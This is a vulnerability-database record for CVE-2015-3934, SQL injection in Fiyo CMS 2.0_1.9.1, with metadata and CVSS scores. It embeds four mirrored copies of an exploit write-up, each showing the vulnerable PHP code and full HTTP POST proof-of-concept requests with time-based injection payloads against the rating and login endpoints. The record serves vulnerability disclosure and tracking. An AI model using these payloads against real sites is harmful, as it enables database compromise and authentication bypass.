ID CVE-2015-3934Type cveReporter cve@mitre.orgModified 2017-12-12T15:39:00
Description
Multiple SQL injection vulnerabilities in Fiyo CMS 2.0_1.9.1 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to apps/app_article/controller/rating.php or (2) user parameter to user/login.
{"id": "CVE-2015-3934", "bulletinFamily": "NVD", "title": "CVE-2015-3934", "description": "Multiple SQL injection vulnerabilities in Fiyo CMS 2.0_1.9.1 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to apps/app_article/controller/rating.php or (2) user parameter to user/login.", "published": "2017-11-21T15:29:00", "modified": "2017-12-12T15:39:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3934", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html"], "cvelist": ["CVE-2015-3934"], "type": "cve", "lastseen": "2021-02-02T06:21:25", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-23811"]}, {"type": "exploitdb", "idList": ["EDB-ID:37446"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132479"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:24A00C597F2907AD9BD275A4EFF99273"]}], "modified": "2021-02-02T06:21:25", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-02-02T06:21:25", "rev": 2}, "vulnersScore": 7.4}, "cpe": ["cpe:/a:fiyo:fiyo_cms:2.0.1.9.1"], "affectedSoftware": [{"cpeName": "fiyo:fiyo_cms", "name": "fiyo fiyo cms", "operator": "eq", "version": "2.0.1.9.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:fiyo:fiyo_cms:2.0.1.9.1:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fiyo:fiyo_cms:2.0.1.9.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html"}]}
{"zdt": [{"lastseen": "2018-03-28T11:20:35", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2015-07-01T00:00:00", "type": "zdt", "title": "Fiyo CMS 2.0_1.9.1 - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-07-01T00:00:00", "id": "1337DAY-ID-23811", "href": "https://0day.today/exploit/description/23811", "sourceData": "# Exploit Title: Fiyo CMS multiple SQL vulnerability\r\n# Date: 2015-06-28\r\n# Exploit Author: cfreer (poc-lab)\r\n# Vendor Homepage: http://www.fiyo.org/\r\n# Software Link:\r\nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip\r\n# Version: 2.0_1.9.1\r\n# Tested on: Apache/2.4.7 (Win32)\r\n# CVE : CVE-2015-3934\r\n \r\n \r\n1\u3001\r\n \r\nThe vulnerable file is /apps/app_article/controller/rating.php, because the\r\nrating.php includes jscore.php, so we must add referer in\r\nHTTP Data Stream to bypass the limits of authority.when the 'do' equal\r\n'rate' the vulnerable is same too.\r\n \r\n \r\nrequire('../../../system/jscore.php');\r\n \r\nif(!isset($_POST['id']))\r\nheader('../../../');\r\nelse {\r\n$id = $_POST['id'];\r\n $db = new FQuery();\r\n$db->connect();\r\n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\");\r\n$qrs = $qrs[0];\r\n \r\n \r\nPOC:\r\n \r\nHTTP Data Stream\r\n \r\nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost:80/fiyocms/\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 48\r\n \r\ndo=getrate&id=182;select sleep(5) --\r\n \r\n \r\n \r\n=====================================================================================================================================\r\n \r\n2\u3001\r\n \r\nPOC:\r\n \r\nPOST /fiyocms/user/login HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=4gl29hsns650jqj5toakt044h0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 71\r\n \r\nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login\r\n \r\n \r\nThe vulnerable file is \\apps\\app_user\\sys_user.php\r\n \r\nif(isset($_POST['login'])) {\r\n$_POST['user'] = strip_tags($_POST['user']);\r\n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]'\r\nAND password='\".MD5($_POST['pass']).\"'\");\r\n \r\n \r\nThe parameter of user is vulnerable. strip_tags doesn't work, Still can be\r\nbypass.\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23811"}], "exploitdb": [{"lastseen": "2016-02-04T05:51:20", "description": "Fiyo CMS 2.0_1.9.1 - SQL Injection. CVE-2015-3934. Webapps exploit for php platform", "published": "2015-06-30T00:00:00", "type": "exploitdb", "title": "Fiyo CMS 2.0_1.9.1 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-06-30T00:00:00", "id": "EDB-ID:37446", "href": "https://www.exploit-db.com/exploits/37446/", "sourceData": "# Exploit Title: Fiyo CMS multiple SQL vulnerability\r\n# Date: 2015-06-28\r\n# Exploit Author: cfreer (poc-lab)\r\n# Vendor Homepage: http://www.fiyo.org/\r\n# Software Link:\r\nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip\r\n# Version: 2.0_1.9.1\r\n# Tested on: Apache/2.4.7 (Win32)\r\n# CVE : CVE-2015-3934\r\n\r\n\r\n1\u3001\r\n\r\nThe vulnerable file is /apps/app_article/controller/rating.php, because the\r\nrating.php includes jscore.php, so we must add referer in\r\nHTTP Data Stream to bypass the limits of authority.when the 'do' equal\r\n'rate' the vulnerable is same too.\r\n\r\n\r\nrequire('../../../system/jscore.php');\r\n\r\nif(!isset($_POST['id']))\r\nheader('../../../');\r\nelse {\r\n$id = $_POST['id'];\r\n $db = new FQuery();\r\n$db->connect();\r\n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\");\r\n$qrs = $qrs[0];\r\n\r\n\r\nPOC:\r\n\r\nHTTP Data Stream\r\n\r\nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost:80/fiyocms/\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 48\r\n\r\ndo=getrate&id=182;select sleep(5) --\r\n\r\n\r\n\r\n=====================================================================================================================================\r\n\r\n2\u3001\r\n\r\nPOC:\r\n\r\nPOST /fiyocms/user/login HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=4gl29hsns650jqj5toakt044h0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 71\r\n\r\nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login\r\n\r\n\r\nThe vulnerable file is \\apps\\app_user\\sys_user.php\r\n\r\nif(isset($_POST['login'])) {\r\n$_POST['user'] = strip_tags($_POST['user']);\r\n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]'\r\nAND password='\".MD5($_POST['pass']).\"'\");\r\n\r\n\r\nThe parameter of user is vulnerable. strip_tags doesn't work, Still can be\r\nbypass.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/37446/"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:04", "description": "", "published": "2015-06-29T00:00:00", "type": "packetstorm", "title": "Fiyo CMS 2.0_1.9.1 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-06-29T00:00:00", "id": "PACKETSTORM:132479", "href": "https://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html", "sourceData": "`# Exploit Title: Fiyo CMS multiple SQL vulnerability \n# Date: 2015-06-28 \n# Exploit Author: cfreer (poc-lab) \n# Vendor Homepage: http://www.fiyo.org/ \n# Software Link: \nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip \n# Version: 2.0_1.9.1 \n# Tested on: Apache/2.4.7 (Win32) \n# CVE : CVE-2015-3934 \n \n \n1\u3001 \n \nThe vulnerable file is /apps/app_article/controller/rating.php, because the \nrating.php includes jscore.php, so we must add referer in \nHTTP Data Stream to bypass the limits of authority.when the 'do' equal \n'rate' the vulnerable is same too. \n \n \nrequire('../../../system/jscore.php'); \n \nif(!isset($_POST['id'])) \nheader('../../../'); \nelse { \n$id = $_POST['id']; \n$db = new FQuery(); \n$db->connect(); \n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\"); \n$qrs = $qrs[0]; \n \n \nPOC: \n \nHTTP Data Stream \n \nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 \nFirefox/37.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost:80/fiyocms/ \nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; \nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 48 \n \ndo=getrate&id=182;select sleep(5) -- \n \n \n \n===================================================================================================================================== \n \n2\u3001 \n \nPOC: \n \nPOST /fiyocms/user/login HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 \nFirefox/37.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; \nPHPSESSID=4gl29hsns650jqj5toakt044h0 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 71 \n \nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login \n \n \nThe vulnerable file is \\apps\\app_user\\sys_user.php \n \nif(isset($_POST['login'])) { \n$_POST['user'] = strip_tags($_POST['user']); \n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]' \nAND password='\".MD5($_POST['pass']).\"'\"); \n \n \nThe parameter of user is vulnerable. strip_tags doesn't work, Still can be \nbypass. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/132479/fiyocms20191-sql.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:15", "description": "\nFiyo CMS 2.0_1.9.1 - SQL Injection", "edition": 1, "published": "2015-06-30T00:00:00", "title": "Fiyo CMS 2.0_1.9.1 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-06-30T00:00:00", "id": "EXPLOITPACK:24A00C597F2907AD9BD275A4EFF99273", "href": "", "sourceData": "# Exploit Title: Fiyo CMS multiple SQL vulnerability\n# Date: 2015-06-28\n# Exploit Author: cfreer (poc-lab)\n# Vendor Homepage: http://www.fiyo.org/\n# Software Link:\nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip\n# Version: 2.0_1.9.1\n# Tested on: Apache/2.4.7 (Win32)\n# CVE : CVE-2015-3934\n\n\n1\u3001\n\nThe vulnerable file is /apps/app_article/controller/rating.php, because the\nrating.php includes jscore.php, so we must add referer in\nHTTP Data Stream to bypass the limits of authority.when the 'do' equal\n'rate' the vulnerable is same too.\n\n\nrequire('../../../system/jscore.php');\n\nif(!isset($_POST['id']))\nheader('../../../');\nelse {\n$id = $_POST['id'];\n $db = new FQuery();\n$db->connect();\n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\");\n$qrs = $qrs[0];\n\n\nPOC:\n\nHTTP Data Stream\n\nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\nFirefox/37.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://localhost:80/fiyocms/\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 48\n\ndo=getrate&id=182;select sleep(5) --\n\n\n\n=====================================================================================================================================\n\n2\u3001\n\nPOC:\n\nPOST /fiyocms/user/login HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\nFirefox/37.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\nPHPSESSID=4gl29hsns650jqj5toakt044h0\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 71\n\nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login\n\n\nThe vulnerable file is \\apps\\app_user\\sys_user.php\n\nif(isset($_POST['login'])) {\n$_POST['user'] = strip_tags($_POST['user']);\n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]'\nAND password='\".MD5($_POST['pass']).\"'\");\n\n\nThe parameter of user is vulnerable. strip_tags doesn't work, Still can be\nbypass.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
